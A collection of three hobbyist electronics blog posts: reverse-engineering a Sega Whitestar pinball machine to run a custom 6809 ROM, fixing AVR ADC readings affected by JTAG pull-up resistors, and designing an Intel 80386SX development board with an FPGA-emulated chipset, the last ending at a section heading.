• # Hacking a Sega Whitestar Pinball

Written by Pierre Surply
2014-12-16 10:05:00

## Sega Starship Troopers Pinball Overview

The Sega Starship Troopers Pinball is fairly representative of the WhiteStar Board System used in several Sega pinball games and Stern Pinball. This hardware architecture was firstly designed in 1995 for the Apollo 13 game with the objective to be convenient and extensible in order to be reusable for other playfields. This way, Sega could exploit a large number of licenses without having to design new control circuits for each machine.

This architecture is based on three Motorola 68B09E clocked at 2MHz and used as main CPU, display controller and sound controller. The two last are mainly dedicated to monitor application-specific processors: for instance, the 6809 used on the display board is charged to interface a 68B45 CRT controller to the main CPU. The sound processing is handled by a BSMT2000, a custom masked-rom version of the TI TMS320C15 DSP.

Sega used this system for 16 other games including GoldenEye, Star Wars and Starship Troopers.

### Playfield's wiring

The playfield wiring is quite simple: all switches are disposed in a matrix grid. This method provides a simple way to handle a high number of I/O with a reasonable number of connectors. So, in order to read the switches state, the CPU has to scan each raw of the matrix by grounding it and watching in which column the current is flowing.

A similar circuit is used to control playfield lamps: each raw has to be scanned by grounding it and applying voltage on the column connector according to lamps that have to be switched on the selected raw.

It's truly easy to control a high number of lamps with this layout. The following code switches on the lamp 31 (multiball).

 1 2 3 4 5 6 lda #$8 sta LAMP_ROW ;; Ground selected row clra sta LAMP_AUX ;; Clear auxiliary rows lda #$40 sta LAMP_COL ;; Drive selected column 

Although playfield switches are handled by the matrix grid, some frequently used buttons are connected to a dedicated connector. This allows the CPU to directly address this input without having to scan the entire input matrix. These switches are user buttons and End-Of-Stroke.

The E.O.S switch prevents foldback when the player has the flipper energized to capture balls. When the Game CPU detects that this switch is open, it stabilizes the position of the selected flip by reducing the pulse applied to the coil.

### The Backbox

The Backbox contains all the electronic circuits controlling playfield's behaviour. We will focus on this very part throughout the article.

#### CPU/Sound Board

The main board contains the Game CPU and the Sound circuit. The switches are directly connected to this board so that it is really simple for the CPU to fetch their values.

One of the main problems of this board is the battery location. Populated with a 3xAA battery holder to keep the RAM content alive, alkaline batteries are located on top of the CPU, ROM and RAM chip, which is critical when they will start to leak on this components. Before I started playing with this machine, I spend hours restoring and cleaning the PCB because of the corrosive leaking. To avoid deterioration, relocating this battery could be a smart idea.

#### Display Controller Board

Like many pinball machines from the 90s, the backbox is equipped with an old school dot matrix display.

As the CPU Board, it is based on a Motorola 68B09E with a dedicated 512MB UVPROM which contains the dot matrix display driver code and images that can be displayed on it. It communicates with the main board via a specific protocol.

To interface the raster display, the board uses a Motorola 68B45 (68B45 CRTC for "cathode ray tube controller"). Although this chip was primarily designed to control the CRT display, it can also be used to generate correctly timed signal for a raster dot matrix display like in this case.

#### I/O Power Driver Board

The IO Power Driver Board is an interface between the low current logic circuit and the high current playfield circuit.

The first part of this circuit consists of converting the alternative current provided by the transformer into exploitable direct current thanks to 5 bridges rectifiers.

The only electromagnetic relay is dedicated to the general illumination and is not controllable via the main CPU. The rest is driven by MOSFET power transistors which are designed to be able to handle high current in order to power playfield coils. Moreover, fuses are placed before each bridges rectifiers in order to easily help identifying where the problem comes from in case of failure.

The title screen displayed in the dot matrix plasma display indicates that the firmware's version is 2.00. However, an up-to-date image of this ROM exists in Internet Pinball Database which seems to be on version 2.01 according to the ascii string located at offset $66D7. Let's try to upgrade the pinball! An almost suitable flash memory to replace the original UVPROM is the A29040C. The only mismatches on the pinout are the A18 and WE pins. This is a minor problem since I fixed the PCB to match the A29040C layout. Burning the A29040C with the new firmware requires a flash memory programmer. I decided to craft one with an Arduino mega 1280 based on an AVR Atmega 1280 microcontroller. The large number of IO of this chip is essential to complete the programming protocol of the A29040C. After successfully programming the flash memory, I was pretty disappointed when I noticed that the new ROM chip was still not working. I thought that this UVPROM was able to store 512KB of data, just like A29040C. It took me a while to realise that the game is a 128KB ROM although the chip is designed to be connected to a 19 bit address bus. This means that the game's ROM simply ignores the value of A17 and A18 signals, which means that the game code is mirrored 4 times in the whole ROM address space. ## Building a custom ROM Now that we are able to substitute the original ROM with a custom flash memory, let's try to run our own code on this machine. The first thing that we have to do in this case is to determine where the CPU will fetch its first instruction after a reset. According to the6809 datasheet, the interrupt vector table (which contents the address of the reset event handler) is located at 0xFFFE. However, this offset refers to the CPU address space, not that of the ROM chip. So, after a reset, which part of this memory is mapped at 0xFFFE? To answer this, it's essential to follow the address bus of the UVPROM. We then easily see that bits 14 to 18 of this bus are connected to 5-bit register (U211) while bits 13 to 0 are directly bound to CPU address bus. This is a typical configuration to implement a bank system since the CPU address space is too narrow to map the entire ROM. That's why only one part of it (also called a bank) is mapped at a given time. The mapped bank is chosen by the U211 register, called XA, and can be easily wrote by the CPU when a bank switching is needed. ### Finding address space On this kind of device, it's always painful to debug the code running directly on the board. The only way to achieve it here is to trigger some visual element of the playfield in order to get a basic tracing of the execution flow. As there is no IO port on the 6809, all devices are memory-mapped. The question now is: where are they located? First, let's focus on the address decoding circuit of the IO Board. In order to simplify cascading, the 74138 multiplexer generates output only if the Boolean expression G1 && !G2A && !G2B is true. So, in this circuit, U204 covers IO addresses from 0x0 to 0x7 and U205 handles from 0x8 to 0xF. As we can see on this schematic, the question is: where does the IOSTB signal come from? Following the wire, we can see that this control signal is generated by the CPU Board. It actually acts as a chip select: it means that this signal is used to indicates to the IO Board that we are addressing it. To be more precise, the IOSTB is driven by the U213 chip, a PAL16L8 (Programmable Array Logic). This kind of integrated circuit is used to implement combinatoric logic expressions. This is widely used for address decoding. Dumping the logical expression programmed on this chip is essential to determine the actual CPU address space. One way to do it is to basically test all possible inputs and watch how outputs evolves according to input values. However, some of the PAL16L8 pins can be considered as inputs as well as outputs. In this case, we can guess that XA0, A9 and A10 are used as input pins according to the rest of the circuit. I desoldered the PAL, in order to prevent undesired side effect on the rest of the circuit, and used a simple Arduino Uno to generate the truth tables of all outputs. Now, let's extract irreducible logical expressions from the recorded truth tables. As a matter of fact, these truth tables are significantly too large to apply the well-known Karnaugh map method to simplify the extended logical expression. This problem can be solved by using the electruth python module. It fully implements the Quine-McCluskey method which is perfectly suitable in this situation. After a few hours of computation, I got these expressions, which are truly helpful in the address space determination process:  1 2 3 4 ~ROMCS = A15 || A14 ~RAMCS = !A15 && !A14 && !A13 && (!A12 || !A11 || !A10 || !A9 || RW || MPIN) IOPORT = !(!A15 && !A14 && A13 && !A12 && !A11 && !XA0) IOSTB = !A15 && !A14 && A13 && !A11  Notice the MPIN input which is a signal generated by the cabinet door when it's open. So, the PAL restricts the access to a small part of the RAM when the coin door is closed. This section is actually used to store game settings that are only editable for maintenance purpose. Here is the address space that I was finally able to discover according to the actual wiring: • 0000-1FFF : RAM • 0000-1DFF : Read/Write Area • 1E00-1FFF : Write Protected Area • 2000-27FF : IO (IOBOARD) • 2000 : HIGH CURRENT SOLENOIDS A • bit 0 : Left Turbo Bumper • bit 1 : Bottom Turbo Bumper • bit 2 : Right Turbo Bumper • bit 3 : Left Slingshot • bit 4 : Right Singshot • bit 5 : Mini Flipper • bit 6 : Left Flipper • bit 7 : Right Flipper • 2001 : HIGH CURRENT SOLENOIDS B • bit 0 : Trough Up-Kicker • bit 1 : Auto Launch • bit 2 : Vertical Up-Kicker • bit 3 : Super Vertical Up-Kicker • bit 4 : Left Magnet • bit 5 : Right Magnet • bit 6 : Brain Bug • bit 7 : European Token Dispenser (not used) • 2002 : LOW CURRENT SOLENOIDS • bit 0 : Stepper Motor #1 • bit 1 : Stepper Motor #2 • bit 2 : Stepper Motor #3 • bit 3 : Stepper Motor #4 • bit 4 : not used • bit 5 : not used • bit 6 : Flash Brain Bug • bit 7 : Option Coin Meter • 2003 : FLASH LAMPS DRIVERS • bit 0 : Flash Red • bit 1 : Flash Yellow • bit 2 : Flash Green • bit 3 : Flash Blue • bit 4 : Flash Multiball • bit 5 : Flash Lt. Ramp • bit 6 : Flash Rt. Ramp • bit 7 : Flash Pops • 2004 : N/A • 2005 : N/A • 2006 : AUX. OUT PORT (not used) • 2007 : AUX. IN PORT (not used) • 2008 : LAMP RETURNS • 2009 : AUX. LAMPS • 200A : LAMP DRIVERS • 3000-37FF : IO (CPU/SOUND BOARD) • 3000 : DEDICATED SWITCH IN • bit 0 : Left Flipper Button • bit 1 : Left Flipper End-of-Stroke • bit 2 : Right Flipper Button • bit 3 : Right Flipper End-of-Stroke • bit 4 : Mini Flipper Button • bit 5 : Red Button • bit 6 : Green Button • bit 7 : Black Button • 3100 : DIP SWITCH • 3200 : BANK SELECT • 3300 : SWITCH MATRIX COLUMNS • 3400 : SWITCH MATRIX ROWS • 3500 : PLASMA IN • 3600 : PLASMA OUT • 3700 : PLASMA STATUS • 4000-7FFF : ROM • 8000-BFFF : ROM (Mirror) • C000-FFFF : ROM (Mirror) ### Handling reset circuitry In this kind of real-time application, where a huge number of unpredictable events have to be handled, the risk of race condition cannot be fully faded. Although the software is designed to be able to face any situations, the hardware has to be prepared to a faulty program. One of the simplest and more robust method is to use a watchdog timer. This consists of an autonomous timer charged to trigger a reset signal to the system if it reaches its initial point. The main idea here is to force the circuitry to be stopped if it does not correctly respond in order to prevent any damage from uncontrolled behaviour. In most cases, the timer has to be fed by the software running on the CPU. So, if we want to run our own code on that machine, it's essential to implement as a subroutine the reset of the watchdog in order to stay alive. In the Whitestar pinball, two distinct watchdogs have to be correctly handled. The first one is located on the CPU/Sound Board and is directly connected to the reset pin of the 6809. SEGA engineers chose to use a DS1232 chip (U210) which integrates all the features that are commonly used to monitor a CPU. So, in addition to a regular watchdog timer, this chip also provides a power monitoring and an external override which is actually designed to allow the use of a push button to force the CPU reset (SW200). As the TOL pin of this chip is grounded, the DS1232 continually watches the voltage applied on Vcc pin and triggers a reset signal if its value is under 4.7V. From a software engineer point of view, the important pin in that case is the strobe input (ST): it is used to reset the watchdog timer when a falling edge is applied to it. On the CPU/Sound Board, this pin is connected to either clock signal (generated by U2) or BSEL signal according to the location of the jumper (Wx or Wy). As Wx was jumpered on my board, we can assume that the configuration in which Wy is fit was used during firmware development. So programmers were able to test their code without having to mind about the watchdog reset: this was automatically done by the clock signal. When the pinball was about to be released, calls to the watchdog reset subroutine were injected in appropriate parts of the firmware and the jumper was moved from Wy to Wx. In my opinion, modifying the hardware by desoldering the jumper and resoldering it on Wy is a little bit too easy to solve this kind of problem. So, let's try to handle the watchdog timer with a suitable software subroutine. The BSEL signal is generated when writing at address 0x3200 and is actually used as clock signal for the bank selection (U211). This is a clever way to get a nonintrusive watchdog reset subroutine: it's, in fact, hooked on the bank switching mechanism. The hardware designers probably thought it was a good idea to check the regularity of the code execution only by testing a periodic bank switching... In our case, we do not need to switch from initial bank. The trick I used here is to write 0 in the XA register, so the bank is unchanged but the watchdog is fed anyway. The second watchdog is located on the IO Board. The chip used is still a DS1232 (U210) but the wiring is a little bit different. Firstly, since there is no code running on that board, the reset pin of the U210 is not connected to a CPU but to all registers (8-bit D flip-flop) which drive power transistors. Secondly, there is no reset pushbutton on the IO Board. The PBRESET pin is connected to the BRESET signal coming directly from the CPU/Sound board. So, if the first DS1231 triggers a reset signal, it automatically overrides the second watchdog timer and forward the signal to all IO Board components. However, this is not reciprocal: the IO Board cannot stops the CPU/Sound Board. The strobe input of this watchdog is directly connected to the DAV0 signal which is used to ground the first raw of the lamp matrix. This means that the firmware has to frequently scan it to keep the IO Board alive. Tricky, but not fully irrelevant since the lights are still blinking on this kind of arcade machine in order to keep the game catchy. All of this reset circuitry have to be kept in mind when developing a firmware for this kind of platform. ### Final code After many hours spent to reverse engineer the hardware part of this machine, I was finally able to print LSE on the 7-segment display of the playfield thanks to the code fetched from a custom flash ROM. Here is the assembly code of my own basic firmware:   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 LAMP_ROW EQU$2008 LAMP_AUX EQU $2009 LAMP_COL EQU$200A BANK_SELECT EQU $3200 ;; CPU/Board Watchdog reset wdr .MACRO clra sta BANK_SELECT .ENDM ;; Dummy delay subroutine delay .MACRO i lda i @l: deca bne @l .ENDM ;; Entry point .ORG 0xC000 main: ldx #lamps clrb stb LAMP_AUX ;; Clear auxiliary rows incb ;; Select first row loop: clra sta LAMP_ROW sta LAMP_COL ;; Clear rows and colunms delay #$1F ;; Dummy delay lda ,x+ ;; Fetch columns value sta LAMP_COL ;; Set columns stb LAMP_ROW ;; Ground selected row delay #$1F ;; Dummy delay wdr ;; Watchdog reset lslb ;; Select next row bne loop ;; Branch if the first 8 rows are not updated bcc main ;; Branch if the 9th row is updated rolb stb LAMP_AUX ;; Select the 9th row clrb bra loop ;; Lamp matrix values lamps: DB$01, $00,$00, $00,$00 DB $00,$1C, $B6,$9F, $00 ;; Interrupt vector table .ORG 0xFFFE reset: DW main  tpasm is needed to assemble the preceding code and turn it into an Intel hex file using the following commands:  1 2 3 4 $ tpasm -P 6809 -o intel cpu.hex cpu.s $hex2bin ./cpu.hex$ dd if=/dev/zero of=cpu.rom bs=16K count=32 $dd if=cpu.bin of=cpu.rom bs=16K seek=31  ## Conclusion Hacking this kind of machine has been as rewarding for me as it is for some people to play flipper. Unfortunatly, Sega Pinball left the market in 1999 (2 years after releasing the Starship Troppers pinball...) and sold all pinball assets to Stern Pinball, Inc. This company used the WhiteStar architecture until 2005 with NASCAR arcade machine. When The Lord of the Rings was released in 2003, they edited some part of the sound system by replacing the Motorola 6809 / BSMT2000 duo by a 32-bit Atmel AT91SAM ARM-based CPU and three Xilinx FPGAs. So the 6809-BSMT2000 system is fully emulated by this circuit to provide backward-compatibility. Now that we have hacked the hardware, what about reverse engineering the original firmware? Maybe another time... I hope you enjoyed this guided tour! ## References • # Dealing with the pull-up resistors on AVR Written by Pierre Surply 2013-08-15 13:10:00 My internship project was to design a temperature monitoring system for the LSE server room. Several homemade temperature probes, based on NTC thermistors, are now arranged in the laboratory. Each of them is connected to a USB interface with a RJ-45 cable. The interface is based on an Atmel AT90USBKEY, a development board based on an AT90USB1287 microcontroller. It features a 10-bit successive approximation Analog-to-Digital Converter connected to an 8-channel Analog Multiplexer and a USB controller, which allows us to create a proper USB HID device. The host probes the interface to get the values of the different temperature sensors and collects them thanks to StatsD. The interface is exposed as a character device if it's binded to the appropriate driver and can communicate with the user space via ioctl() syscall. In our case, the interface is connected to a Sheevaplug, an ARM-based plug computer, which probes the values every 10 seconds and send them to the StatsD server via UDP. The first problem I had to face is the strange values returned by the ADC on the channels 4 to 7 when no analog pin is connected:  1 2 3 4 5 6 7 8 9 $ cat /proc/temp_sensors T0: 478 T1: 473 T2: 471 T3: 383 T4: 1019 T5: 1023 T6: 1023 T7: 1023 

1023 is the maximum value of the ADC result, this means that the analog inputs were subject to a voltage equal to the reference voltage (here, Varef = 3.3V).

Thanks to AT90USB1287 documentation, we can see that pins PF4, PF5, PF6 and PF7 are also used by the JTAG interface.

Port F pins alternate functions

If the JTAG interface is enabled, the pull-up resistors on pins PF7(TDI), PF5(TMS) and PF4(TCK) will be activated even if a Reset occurs. (AT90USB1287 specifications, Page 88)

In fact, it seems that the pin PF6 (TDO) pull-up resistor is also activated when the JTAG interface is enabled.

The input impedance of a converter is very high (due to internal operational amplifier), this justifies the fact that we find the voltage reference in the analog channels 4 to 7.

If we wanted to keep the JTAG enabled, the schematic of the electronic circuit would be:

The equivalent resistor Rh can easily be calculated:

$R_h = \frac{R_1\times R_{pu}}{R_1+R_{pu}}$

Then, the resistance of the thermistor, which represents the current temperature, is given by:

$R_t = \frac{R_h \times V_{ADC}}{V_{cc} - V_{ADC}}$

Theoretically, we could consider this pull-up resistor in the calculation of the thermistor. However, the AT90USB1287 specifications indicate that the values of the pull-up resistors are contained between 20KΩ and 50KΩ. This interval is too large to properly calibrate the sensors.

Never mind: let's disable the JTAG interface! We don't really need it in our case.

The first way to do it is to unprogram JTAGEN fuse of the microcontroller. However, I can only use DFU (Device Firmware Upgrade) to program the device because I do not have the required equipment to use ICSP, JTAG or parallel programming for this kind of chip and, unfortunately, Fuses cannot be reprogrammed by the bootloader.

The other way is to set the bit JTD in the MCUCR register. In order to avoid unintentional disabling or enabling, the specifications ask to the application software to write this bit to the desired value twice within four cycles to change its value. This can be done with the following instructions:

 1 2 3 4 5 asm volatile ("out %1, %0" "\n\t" "out %1, %0" "\n\t" : : "r" ((uint8_t) 1 << JTD), "i" (_SFR_IO_ADDR(MCUCR))); 

Afterwards, the analog inputs 4 to 7 will get a normal behaviour and we can now use them to collect the different temperatures.

 1 2 3 4 5 6 7 8 9 \$ cat /proc/temp_sensors T0: 478 T1: 383 T2: 348 T3: 376 T4: 310 T5: 278 T6: 257 T7: 107 

All values returned by the device are proportional to the thermistors voltage. As Negative Temperature Coefficient thermistors, their resistance goes up as temperature goes down and the temperature/resistance curve is not linear. The temperature (°C) can be calculated from this resistance with the following expression:

$T = \frac{\beta}{\ln{\frac{R_t}{R_h}} + \frac{\beta}{T_0}} + K_0$
• Rt = thermistor resistance (Ω)
• Rh = second bridge resistor (Ω)
• β = NTC parameter equation (here, β = 4092)
• T0 = 298 °K (273 °K + 25 °K)
• K0 = 273 °K (= 0 °C)

Finally, this temperature monitoring system seems to work and we are now able to see how temperatures of the laboratory evolves as a function of time.

Evolution of temperatures (°C) as a function of time

• # Designing an Intel 80386SX development board

Written by Pierre Surply
2015-11-16 15:50:00

The LSE-PC aims to be a compact IBM-PC compatible development board based on an Intel 80386SX CPU and an Altera Cyclone IV EP4CE22E22 FPGA in order to emulate a custom chipset.

The main goal of this project is to create a simple, debuggable and customisable version of the well-known PC hardware architecture. Its purpose is mainly didactic for students or experienced developers who want to get started into x86 low-level programming.

## Hardware Overview

The schematics were designed using gschem which is a part of the gEDA project. Although the provided component library is acceptable, most of the chips used on this board are outlandish and so need to be drawn before starting overall schematics. This rude work was achieved by using djboxsym tool which allows quick production of gschem symbols from a minimal description.

### Central Processing Unit

The CPU used on this board is a 80386SX designed by Intel and released in 1986. It is basically a cut-down version of the original 386 with a 16-bit physical data bus. Although memory access performance is hardly affected, it is still fully 32-bit internally and was designed to be used in a 16-bit environment which is simpler and cheaper to design that a full 32-bit compatible motherboard. The physical address bus is only 24-bit which limits address space to 16MB.

The model used here is an NG80386SXLP20 which is a low power version clocked at 20MHz and packaged in a 100-pin Plastic Quad Flat pack. Of course, this chip is today considered obsolete but is still the only 32-bit x86 CPU which is simple enough to be integrated in an amateur board.

### Field-Programmable Gate Array

The main criterion for choosing an appropriate FPGA was about packaging. Knowing that this chip will be hand-soldered, selecting a Ball Grid Array based component was inconceivable. I'm also quite used to work with Altera's FPGA so one from the Cyclone IV series was a good compromise. The model chosen is an EP4CE22E22C7N released in 2009. With its 22320 logic elements, it is one of the largest FPGA available on EQFP. This package, only used by Altera, is an enhanced version of the standard plastic quad flat package which uses a step of 0.5 millimeter between each pins. This layout allows the FPGA to expose 144 pins where 62 can be used as I/O and 15 as clock inputs.

An other useful feature is the 3.3V PCI compliant mode of the IO banks. It provides compatibility with 5V devices by enabling a clamping diode which can supports 25mA. This explains the use of 120 Ohms resistors between CPU 5V signals and FPGA IO.

The CPU needs a 20MHz input clock to operate correctly. A unique oscillator is used to clock CPU and FPGA. The idea here is to assume that if the FPGA needs a higher clock speed, the use of an internal Phase Locked Loop will be considered to obtain the desired frequency from this 20MHz clock.

FPGA programming and debugging can be performed through JTAG. Altera provides a dedicated programmer called the USB Blaster which can be easily used with Quartus II. It provides a standard 10-pin connector and operates here at 2.5V.

As FPGA configuration is volatile, it is necessary to provide an external way to program it when the board is powered on. Here this is achieved by an external serial flash which contains the whole FPGA configuration. Altera sells EPCQ devices which are dedicated to that purpose. However, most of the time those are expensive and it turns out that they are nothing more than SPI flash memories. That is why it has been decided to use an M25P16, a 16Mbits flash memory from Micron which perfectly do the job.

In fact, several programming modes are available in this FPGA. In order to indicate what mode has to be used, MSEL pins must be pulled-up or pulled-down to encode the mode number. To select the Active Serial Programming mode, it is necessary to solder 120 Ohms resistors on R77, R79 and R81.

### USB/UART bridge

In addition to JTAG, it can be a good idea to provide USB connectivity to this design. However, implementing USB protocol stack in an FPGA can be really painful. The purpose of the FT230X chip is to provide a simple bridge between an USB and an UART interface which is simpler to implement in an FPGA. It is provided in a SSOP16 package and is really simple to wire thanks notably to the fully integrated clock generation which does no require an external crystal.

### Static Random Access Memory

For the main RAM, AS6C8016 from Alliance Memory has been chosen. This is a 512K x 16-bit CMOS static RAM packaged in a 44-pin TSOP. It features tri-state output and data byte control (LB and UB signals) as required by the 80386SX.

Although this chip was originally designed to be used as a battery backed-up non-volatile memory, its usage simplicity and its response time justify the low storage space. So 1MB ought to be enough for anybody. Also, AS6C8016 is powered by 5V but is still fully TTL compatible which means that it can be driven by the CPU as well as the 3.3V outputted by FPGA's IO. So control signals as RAMCS and RAMWE are only driven by the FPGA which will perform address decoding.

### Voltage Regulation

The power circuitry has to provide four sources of different voltages:

• 5V: CPU, SRAM
• 3.3V: FPGA In/Out
• 2.5V: FPGA Analog PLL
• 1.2V: FPGA internal logic, Digital PLL

Regulation is achieved by three fixed low drop positive voltage regulators which operate from the 5V supplied by the USB. Even though fixed regulators are often more expensive that adjustable regulators, they are easier to wire and reduce the number of passive components needed to perform adjustment. Only 250mA are provided for 2.5V because it is only used by FPGA Analog PLL and JTAG target voltage.

### Routing and Manufacturing the Printed Circuit Board

Once the schematics completed, PCB has to be designed. This process has been assisted by pcb, an other part of gEDA project. As schematics and PCB designs are not performed using the same software (as KiCad or Eagle do), synchronization between those is ensured thanks to the gsch2pcb tool.

As some components on the board do not use standard packages, creating custom pcb footprint for those chip is necessary. Like symbols generation, footprints was generated using footgen.

The PCB routing here is a bit tricky due to the large number of signals needed to drive the CPU. A 4-layer PCB is unavoidable in order to achieve routing and to preserve signal integrity. As our manufacturer limits 4-layer board 5 x 10cm, this is the dimension adopted which is large enough for this design.

Each layer has a dedicated purpose:

• Top layer : it is mainly used for signals routing. Traces used for data signal are 0.20mm width which is the limit imposed by manufacturer. Unused spaces are recycled to ground planes. FPGA, CPU and voltage regulators are soldered on this layer.
• Ground layer : Used almost exclusively to get a common ground plane in the whole circuit. It has also been used to complete RAM routing.
• Power layer : Dedicated to conduct power rails through the board. Four areas corresponding to each voltage level can be clearly seen on this layer.
• Bottom layer : Like the top layer, this is mainly used for signals routing. Capacitors used to apply local filtering are soldered on this side as well as SRAM and 20MHz oscillator.

With a low end SMD soldering station, it takes approximately three hours to solder a whole board.

In addition to PCB, acrylic case was designed using FreeCAD and then manufactured.

## Emulating a rudimentary chipset

Now that the board is correctly soldered, the last thing to do before being able to run code on the CPU is to configure the FPGA in order to emulate a basic chipset. The design is composed of two parts : the bus controller and the memory controller.

### Bus Controller

The bus controller has to handle 80386SX bus access protocol. In order to understand the exact purpose of it, it is necessary to detail signals involved in the process.

• The Data Bus (D[15:0]) is composed of three-state bidirectional signals providing a general purpose data path between 386 and other devices (such as memory).
• The Address Bus (A[23:1], BHE#, BLE#) is composed of three-state outputs providing physical memory addresses or I/O port addresses. The Byte Enable outputs (BHE# and BLE#) indicate which bytes of the 16-bit data bus are involved with the current transfer. If both of them are asserted, then 16 bits word is being transferred,
• A Bus Cycle is defined by W/R#, D/C#, M/IO# and LOCK# three-state outputs. W/R# distinguishes between write and read cycles, D/C# distinguishes between data and control cycles, M/IO# distinguishes between memory and I/O cycles and #LOCK indicates if the current operation is atomic or not.
• The Bus Access is controlled by ADS#, READY# and NA#. The Address Status (ADS#) indicates that a valid bus cycle definition and address are being driven from the 386 pins. Most of the bus controller logic must be based on the falling-edge of this signal. READY# signal indicates a transfer acknowledge driven by the bus controller to the 386. NA# signal is used to request address pipelining which is not relevant in this case.

As an example, here is a waveform of bus signals during these operations :

• Idle

Each bus access operates in two steps. The first one, indicated by ADS# is used to drive Bus Cycle Definition signals and an address. The second one take place during the next rising edge of the main clock. Depending on the W/R# pin state, the data bus is driven with the value the CPU wants to write. During all these sequences ADS# is still asserted.

The next bus cycle is performed when the 386 detects a falling edge on the READY# signal. So the bus controller can be easily modeled as the following Finite-State Machine :

It is simple to implement this behavior in Verilog :

  1 2 3 4 5 6 7 8 9 10 11 12 always @(posedge clk) begin if (!_ads) begin capture_bus(); // Capture values driven on // A[23:1], D[15:0], /BLE, /BHE, WR, DC and MIO _ready <= 1; state <= ST_T1; end else if (state == ST_T1) begin _ready <= 0; state <= ST_T2; end end 

As data bus is bidirectional, it is sometimes necessary to set it in high impedance in order to let another device driving the bus. It is also needed to respect bytes requested by the CPU via BHE# and BLE#.

 1 2 assign d[15:8] = wr || _bhe || !ramcs ? 8'hzz : dout[15:8]; assign d[7:0] = wr || _ble || !ramcs ? 8'hzz : dout[7:0]; 

### Memory Controller

Once the bus protocol is properly respected, the address requested by the CPU must be decoded in order to figure out which device must be selected. This is here the purpose of the memory controller unit.

Altera Cyclone IV devices features embedded memory structures. It consists of M9K memory blocks that can be configured to provide various memory functions, such as RAM, shift registers or ROM. The idea here is to use it to create a small memory which is initialized with a basic piece of code dedicated to CPU initialization. An other useful feature of this memory is to be easily readable and editable through JTAG using the In-System Content Editor provided by Quartus II.

Basically, the main address space is composed of two memories : an external (i.e. the SRAM) and an internal (i.e. the M9K blocks).

The first megabyte of addressable memory is organized as the layout of the traditional IBM-PC. It means that only the first 640K of external memory are mapped from 0x000000 to 0x0A0000 and BIOS shadow ROM (implemented here with internal memory) is mapped from 0x0F8000 to 0x100000. Shadow ROM was originally a 64KB memory which contains a copy of the BIOS ROM mapped on the last 64KB of the address space. As the CPU starts fetching instructions at 0xFFFFF0 after a reset, the mechanism consists of mapping a ROM at this address, copying ROM content on the shadow ROM and then jumping on a subroutine located on the first megabyte.

Here, the internal RAM is only 32KB due to the FPGA limitations and is located at 0xFF8000 and 0x0F8000 which allows simulation of the original machinery. Moreover, the whole SRAM is mapped from 1MB which means that first 640KB of external RAM are mapped twice.

Memory controller unit can be simplified as :

The actual address space layout is achieved by applying a logic expression to the chip select signal of each memory. Notice that WE# signal of SRAM is not active on the same level that W/R# 386 signal. So this signal is inverted by the FPGA.

 1 2 3 4 5 assign eramwe = !wr; assign eramcs = !(cs && ((addr[23:16] < 8'h0A) || (addr[23:20] == 4'h1))); assign iramcs = cs && ((addr[23:15] == 9'h1FF) || (addr[23:15] == 9'h01F)); 

### Skeleton of a basic firmware

As an example, this section will present a basic firmware which can be run on the LSE-PC.

Firstly, it is considered here that the entire firmware will be located on the internal memory which is automatically initialized when the design is loaded into the FPGA.

On reset, the 80386 CPU is running in real mode and will start to execute the instructions located at the end of the address space: 0xFFFFF0. So the purpose of these instructions are to jump to the first megabyte by reloading Code Segment. However, the last 16 bytes can be used to set a minimal environment to allow 16-bit application execution. The following code is an example of 5 instructions that can be assembled to 16 bytes of opcodes. It basically sets Data, Stack and Code Segment Selector, sets the stack pointer and then jumps to the beginning of the internal ram mapped at 0x8000.

 1 2 3 4 5 6 7 org 0xFFF0 ;; CS:0xF000, IP:0xFFF0 reset: mov ax, 0xF000 mov ds, ax mov ss, ax mov sp, 0xFFF0 jmp 0xF000:0x8000 

Now that the execution flow has exited the reset state, it is now possible to set the CPU to protected mode. This can be achieved by loading a simple Global Descriptor Table which defines memory segments that will be used in protected mode. Notice that the jump to reload_segs is used to flush instruction the prefetch queue after enabling protected mode in order to validate segment reloading. This code can be improved by the setting of an Interrupt Descriptor Table in addition of a Global Descriptor Table.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 org 0x8000 startup: lgdt [gdtr] ;; Load Glocal Descriptor Table mov eax, cr0 ;; Enable protected mode or eax, 1 mov cr0, eax jmp reload_segs ;; Flush prefetch queue reload_segs: mov ax, 0x10 ;; Reload segment selectors mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax ;; ljmp 0x08:0xF8400 dw 0xEA66 ;; Reload CS and jump to application code dd 0xF8400 dw 0x08 align 16 gdt: ... gdtr: Limit dw gdtr - gdt - 1 Base dd 0xF0000 + gdt 

A 32-bit application can then be located at 0xF8400. The internal RAM is segmented according to the following layout :

As the In-Sytem Memory Content Editor accepts a special binary format called MIF (Memory Initialization File), a dedicated OCaml script has been created to facilitate linking of several raw binary object files.

 1 2 3 4 5 bin2mif -o fw.mif -b 0xF8000 0 \ # Memory base address -i pm.bin 0xF8000 0 \ # Jump to protected mode code -i app.bin 0xFC000 0 \ # Application code -i reset.bin 0xFFFF0 0 # Reset routine code 

## Providing debug facilities

Even though Altera's FPGA provide an efficient internal signal analyser thanks to SignalTap, it is a real pain to make software debugging when the size of applications running on the 386 become significant. Adding a flexible on-chip debug facility based on the UART communication to this design is one of the main challenge of this project.

### Supervisor

The supervisor is designed using Altera's QSys tool which assists the creation of systems based on the NIOS II soft-processor. This system is composed of a private on-chip memory which contains NIOS instructions and data, and of an UART which is connected to FT230X chip.

The protocol between the host and the supervisor is pretty simple and it considers that the CPU is at any time in one of these states :

• STOP : CPU is stopped. RESET signal is asserted.
• RUN : CPU is running.
• IORD / IOWR : CPU is trying to perform an access to IO ports. Distinction between read and write operation is done. Those states are used to allow device emulation.
• BRK16 / BRK32 : CPU is ready to accept debug operations. Distinction between real and protected mode is done.

It is accurate to implement the protocol logic through NIOS software instead of having it hardwired in Verilog. However, directly handling 386 signals on the NIOS is inefficient due to execution speed of this system. The idea here is to export the 386 signal handling job to an other module dedicated to it : the On-Chip Debug Unit.

The OCD Unit can take the control of 386 buses at anytime by asserting the ocd.en signal, which disable the original bus controller described before. The communication between those two units is ensured by a dual-port shared memory accessible through Avalon bus and two PIO registers. The first one, OCD_CTL, is used to reset the OCD Unit from supervisor. The second, OCD_STATUS indicates if the unit is running or not. The shared memory contains a routine that must be applied on 386.

### On-Chip Debug Unit

